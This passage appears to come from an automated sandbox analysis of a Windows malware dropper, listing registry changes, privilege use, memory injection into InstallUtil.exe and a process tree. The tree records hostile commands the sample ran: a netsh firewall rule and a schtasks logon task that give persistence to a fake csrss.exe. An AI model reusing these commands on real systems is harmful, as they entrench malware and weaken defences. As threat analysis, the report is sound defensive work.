"Pacific SA Standard Time" ZWaNCawf3dZ4eT3o5QvqYRLW.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time" ZWaNCawf3dZ4eT3o5QvqYRLW.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-364 = "Middle East Daylight Time" ZWaNCawf3dZ4eT3o5QvqYRLW.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time" ZWaNCawf3dZ4eT3o5QvqYRLW.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs rundll32.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs rundll32.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-412 = "E. Africa Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-532 = "Sri Lanka Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time" ZWaNCawf3dZ4eT3o5QvqYRLW.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time" ZWaNCawf3dZ4eT3o5QvqYRLW.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA Conhost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time" ZWaNCawf3dZ4eT3o5QvqYRLW.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates rundll32.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs rundll32.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs Conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time" ZWaNCawf3dZ4eT3o5QvqYRLW.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2532 = "Chatham Islands Standard Time" ZWaNCawf3dZ4eT3o5QvqYRLW.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)" ZWaNCawf3dZ4eT3o5QvqYRLW.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-492 = "India Standard Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1411 = "Syria Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2841 = "Saratov Daylight Time" ZWaNCawf3dZ4eT3o5QvqYRLW.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-141 = "Canada Central Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-141 = "Canada Central Daylight Time" ZWaNCawf3dZ4eT3o5QvqYRLW.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 zhqw0x5VEifunzipVxSGz3iI.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e75490f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e4190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e zhqw0x5VEifunzipVxSGz3iI.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c000000010000000400000000100000190000000100000010000000ffac207997bb2cfe865570179ee037b9030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e199604000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e zhqw0x5VEifunzipVxSGz3iI.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 696 EWJZ39UCGs8aWbGUePjQcrz2.exe 696 EWJZ39UCGs8aWbGUePjQcrz2.exe 4544 Qw369efixtIBKFp9ZFZ0w0mq.exe 4544 Qw369efixtIBKFp9ZFZ0w0mq.exe 3268 powershell.exe 3268 powershell.exe 3268 powershell.exe 3268 powershell.exe 3252 powershell.exe 3252 powershell.exe 520 powershell.exe 520 powershell.exe 520 powershell.exe 3252 powershell.exe 4544 Qw369efixtIBKFp9ZFZ0w0mq.exe 4544 Qw369efixtIBKFp9ZFZ0w0mq.exe 3820 powershell.EXE 3820 powershell.EXE 3820 powershell.EXE 4544 Qw369efixtIBKFp9ZFZ0w0mq.exe 4544 Qw369efixtIBKFp9ZFZ0w0mq.exe 4544 Qw369efixtIBKFp9ZFZ0w0mq.exe 4544 Qw369efixtIBKFp9ZFZ0w0mq.exe 4544 Qw369efixtIBKFp9ZFZ0w0mq.exe 4544 Qw369efixtIBKFp9ZFZ0w0mq.exe 520 powershell.exe 4544 Qw369efixtIBKFp9ZFZ0w0mq.exe 4544 Qw369efixtIBKFp9ZFZ0w0mq.exe 3252 powershell.exe 3820 powershell.EXE 4372 updater.exe 4372 updater.exe 4528 powershell.exe 4528 powershell.exe 4528 powershell.exe 4528 powershell.exe 4704 ZWaNCawf3dZ4eT3o5QvqYRLW.exe 4704 ZWaNCawf3dZ4eT3o5QvqYRLW.exe 1124 FcrfIQnc3MnN2EYixmyTFb6D.exe 1124 FcrfIQnc3MnN2EYixmyTFb6D.exe 1584 powershell.exe 1584 powershell.exe 4928 powershell.exe 4928 powershell.exe 1584 powershell.exe 4928 powershell.exe 1584 powershell.exe 4928 powershell.exe 4868 powershell.exe 4868 powershell.exe 4868 powershell.exe 4868 powershell.exe 4496 ZWaNCawf3dZ4eT3o5QvqYRLW.exe 4496 ZWaNCawf3dZ4eT3o5QvqYRLW.exe 4328 cmd.exe 4328 cmd.exe 4496 ZWaNCawf3dZ4eT3o5QvqYRLW.exe 4496 ZWaNCawf3dZ4eT3o5QvqYRLW.exe 596 powershell.exe 596 powershell.exe 4496 ZWaNCawf3dZ4eT3o5QvqYRLW.exe 4496 ZWaNCawf3dZ4eT3o5QvqYRLW.exe 4496 ZWaNCawf3dZ4eT3o5QvqYRLW.exe 4496 ZWaNCawf3dZ4eT3o5QvqYRLW.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 628 Process not Found -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3748 InstallUtil.exe Token: SeDebugPrivilege 1384 mAIqaeuuMoGky7kZVzMJ1DQQ.exe Token: SeDebugPrivilege 3268 powershell.exe Token: SeDebugPrivilege 3252 powershell.exe Token: SeDebugPrivilege 520 powershell.exe Token: SeIncreaseQuotaPrivilege 3268 powershell.exe Token: SeSecurityPrivilege 3268 powershell.exe Token: SeTakeOwnershipPrivilege 3268 powershell.exe Token: SeLoadDriverPrivilege 3268 powershell.exe Token: SeSystemProfilePrivilege 3268 powershell.exe Token: SeSystemtimePrivilege 3268 powershell.exe Token: SeProfSingleProcessPrivilege 3268 powershell.exe Token: SeIncBasePriorityPrivilege 3268 powershell.exe Token: SeCreatePagefilePrivilege 3268 powershell.exe Token: SeBackupPrivilege 3268 powershell.exe Token: SeRestorePrivilege 3268 powershell.exe Token: SeShutdownPrivilege 3268 powershell.exe Token: SeDebugPrivilege 3268 powershell.exe Token: SeSystemEnvironmentPrivilege 3268 powershell.exe Token: SeRemoteShutdownPrivilege 3268 powershell.exe Token: SeUndockPrivilege 3268 powershell.exe Token: SeManageVolumePrivilege 3268 powershell.exe Token: 33 3268 powershell.exe Token: 34 3268 powershell.exe Token: 35 3268 powershell.exe Token: 36 3268 powershell.exe Token: SeDebugPrivilege 3820 powershell.EXE Token: SeShutdownPrivilege 196 powercfg.exe Token: SeCreatePagefilePrivilege 196 powercfg.exe Token: SeShutdownPrivilege 3104 powercfg.exe Token: SeCreatePagefilePrivilege 3104 powercfg.exe Token: SeShutdownPrivilege 592 powercfg.exe Token: SeCreatePagefilePrivilege 592 powercfg.exe Token: SeShutdownPrivilege 4908 assistant_installer.exe Token: SeCreatePagefilePrivilege 4908 assistant_installer.exe Token: SeDebugPrivilege 4528 powershell.exe Token: SeDebugPrivilege 4704 ZWaNCawf3dZ4eT3o5QvqYRLW.exe Token: SeImpersonatePrivilege 4704 ZWaNCawf3dZ4eT3o5QvqYRLW.exe Token: SeAssignPrimaryTokenPrivilege 4528 powershell.exe Token: SeIncreaseQuotaPrivilege 4528 powershell.exe Token: SeSecurityPrivilege 4528 powershell.exe Token: SeTakeOwnershipPrivilege 4528 powershell.exe Token: SeLoadDriverPrivilege 4528 powershell.exe Token: SeSystemtimePrivilege 4528 powershell.exe Token: SeBackupPrivilege 4528 powershell.exe Token: SeRestorePrivilege 4528 powershell.exe Token: SeShutdownPrivilege 4528 powershell.exe Token: SeSystemEnvironmentPrivilege 4528 powershell.exe Token: SeUndockPrivilege 4528 powershell.exe Token: SeManageVolumePrivilege 4528 powershell.exe Token: SeDebugPrivilege 1124 FcrfIQnc3MnN2EYixmyTFb6D.exe Token: SeImpersonatePrivilege 1124 FcrfIQnc3MnN2EYixmyTFb6D.exe Token: SeDebugPrivilege 1584 powershell.exe Token: SeDebugPrivilege 4928 powershell.exe Token: SeDebugPrivilege 4868 powershell.exe Token: SeDebugPrivilege 596 powershell.exe Token: SeDebugPrivilege 4228 powershell.exe Token: SeDebugPrivilege 1028 rundll32.EXE Token: SeDebugPrivilege 432 powershell.exe Token: SeShutdownPrivilege 2260 powercfg.exe Token: SeCreatePagefilePrivilege 2260 powercfg.exe Token: SeShutdownPrivilege 3528 powercfg.exe Token: SeCreatePagefilePrivilege 3528 powercfg.exe Token: SeShutdownPrivilege 3332 powercfg.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3792 wrote to memory of 3748 3792 85c7ebf244cb05f624baea0b1526c57ba3ecaa05583c27fe814217f9ffbf020c.exe 70 PID 3792 wrote to memory of 3748 3792 85c7ebf244cb05f624baea0b1526c57ba3ecaa05583c27fe814217f9ffbf020c.exe 70 PID 3792 wrote to memory of 3748 3792 85c7ebf244cb05f624baea0b1526c57ba3ecaa05583c27fe814217f9ffbf020c.exe 70 PID 3792 wrote to memory of 3748 3792 85c7ebf244cb05f624baea0b1526c57ba3ecaa05583c27fe814217f9ffbf020c.exe 70 PID 3792 wrote to memory of 3748 3792 85c7ebf244cb05f624baea0b1526c57ba3ecaa05583c27fe814217f9ffbf020c.exe 70 PID 3792 wrote to memory of 3748 3792 85c7ebf244cb05f624baea0b1526c57ba3ecaa05583c27fe814217f9ffbf020c.exe 70 PID 3792 wrote to memory of 3748 3792 85c7ebf244cb05f624baea0b1526c57ba3ecaa05583c27fe814217f9ffbf020c.exe 70 PID 3792 wrote to memory of 3748 3792 85c7ebf244cb05f624baea0b1526c57ba3ecaa05583c27fe814217f9ffbf020c.exe 70 PID 3748 wrote to memory of 4704 3748 InstallUtil.exe 71 PID 3748 wrote to memory of 4704 3748 InstallUtil.exe 71 PID 3748 wrote to memory of 4704 3748 InstallUtil.exe 71 PID 3748 wrote to memory of 1124 3748 InstallUtil.exe 73 PID 3748 wrote to memory of 1124 3748 InstallUtil.exe 73 PID 3748 wrote to memory of 1124 3748 InstallUtil.exe 73 PID 3748 wrote to memory of 4544 3748 InstallUtil.exe 72 PID 3748 wrote to memory of 4544 3748 InstallUtil.exe 72 PID 3748 wrote to memory of 1384 3748 InstallUtil.exe 74 PID 3748 wrote to memory of 1384 3748 InstallUtil.exe 74 PID 3748 wrote to memory of 1384 3748 InstallUtil.exe 74 PID 3748 wrote to memory of 1204 3748 InstallUtil.exe 75 PID 3748 wrote to memory of 1204 3748 InstallUtil.exe 75 PID 3748 wrote to memory of 1204 3748 InstallUtil.exe 75 PID 3748 wrote to memory of 696 3748 InstallUtil.exe 76 PID 3748 wrote to memory of 696 3748 InstallUtil.exe 76 PID 3748 wrote to memory of 696 3748 InstallUtil.exe 76 PID 1204 wrote to memory of 748 1204 zhqw0x5VEifunzipVxSGz3iI.exe 77 PID 1204 wrote to memory of 748 1204 zhqw0x5VEifunzipVxSGz3iI.exe 77 PID 1204 wrote to memory of 748 1204 zhqw0x5VEifunzipVxSGz3iI.exe 77 PID 1204 wrote to memory of 4908 1204 zhqw0x5VEifunzipVxSGz3iI.exe 78 PID 1204 wrote to memory of 4908 1204 zhqw0x5VEifunzipVxSGz3iI.exe 78 PID 1204 wrote to memory of 4908 1204 zhqw0x5VEifunzipVxSGz3iI.exe 78 PID 1204 wrote to memory of 4940 1204 zhqw0x5VEifunzipVxSGz3iI.exe 79 PID 1204 wrote to memory of 4940 1204 zhqw0x5VEifunzipVxSGz3iI.exe 79 PID 1204 wrote to memory of 4940 1204 zhqw0x5VEifunzipVxSGz3iI.exe 79 PID 4940 wrote to memory of 4272 4940 zhqw0x5VEifunzipVxSGz3iI.exe 80 PID 4940 wrote to memory of 4272 4940 zhqw0x5VEifunzipVxSGz3iI.exe 80 PID 4940 wrote to memory of 4272 4940 zhqw0x5VEifunzipVxSGz3iI.exe 80 PID 3748 wrote to memory of 2856 3748 InstallUtil.exe 82 PID 3748 wrote to memory of 2856 3748 InstallUtil.exe 82 PID 3748 wrote to memory of 2856 3748 InstallUtil.exe 82 PID 2856 wrote to memory of 2816 2856 NjD3wZxeeWlSx5eQJUW3XsQg.exe 83 PID 2856 wrote to memory of 2816 2856 NjD3wZxeeWlSx5eQJUW3XsQg.exe 83 PID 2856 wrote to memory of 2816 2856 NjD3wZxeeWlSx5eQJUW3XsQg.exe 83 PID 2816 wrote to memory of 4364 2816 Install.exe 84 PID 2816 wrote to memory of 4364 2816 Install.exe 84 PID 2816 wrote to memory of 4364 2816 Install.exe 84 PID 4364 wrote to memory of 1300 4364 Install.exe 94 PID 4364 wrote to memory of 1300 4364 Install.exe 94 PID 4364 wrote to memory of 1300 4364 Install.exe 94 PID 4364 wrote to memory of 3576 4364 Install.exe 86 PID 4364 wrote to memory of 3576 4364 Install.exe 86 PID 4364 wrote to memory of 3576 4364 Install.exe 86 PID 1300 wrote to memory of 1268 1300 forfiles.exe 87 PID 1300 wrote to memory of 1268 1300 forfiles.exe 87 PID 1300 wrote to memory of 1268 1300 forfiles.exe 87 PID 3576 wrote to memory of 4568 3576 forfiles.exe 92 PID 3576 wrote to memory of 4568 3576 forfiles.exe 92 PID 3576 wrote to memory of 4568 3576 forfiles.exe 92 PID 1268 wrote to memory of 4612 1268 cmd.exe 91 PID 1268 wrote to memory of 4612 1268 cmd.exe 91 PID 1268 wrote to memory of 4612 1268 cmd.exe 91 PID 1268 wrote to memory of 592 1268 cmd.exe 88 PID 1268 wrote to memory of 592 1268 cmd.exe 88 PID 1268 wrote to memory of 592 1268 cmd.exe 88 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3116
-
C:\Users\Admin\AppData\Local\Temp\85c7ebf244cb05f624baea0b1526c57ba3ecaa05583c27fe814217f9ffbf020c.exe"C:\Users\Admin\AppData\Local\Temp\85c7ebf244cb05f624baea0b1526c57ba3ecaa05583c27fe814217f9ffbf020c.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3792 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"3⤵
- Drops startup file
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3748 -
C:\Users\Admin\Pictures\ZWaNCawf3dZ4eT3o5QvqYRLW.exe"C:\Users\Admin\Pictures\ZWaNCawf3dZ4eT3o5QvqYRLW.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4704 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:520
-
-
C:\Users\Admin\Pictures\ZWaNCawf3dZ4eT3o5QvqYRLW.exe"C:\Users\Admin\Pictures\ZWaNCawf3dZ4eT3o5QvqYRLW.exe"5⤵
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4496 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1584
-
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"6⤵PID:3428
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes7⤵
- Modifies Windows Firewall
PID:3016
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4228
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:432
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe6⤵
- Executes dropped EXE
- Adds Run key to start application
- Manipulates WinMonFS driver.
- Drops file in Windows directory
PID:1344 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4500
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F7⤵
- Creates scheduled task(s)
PID:3156
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f7⤵PID:4296
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:1288
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵PID:4152
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵PID:2240
-
-
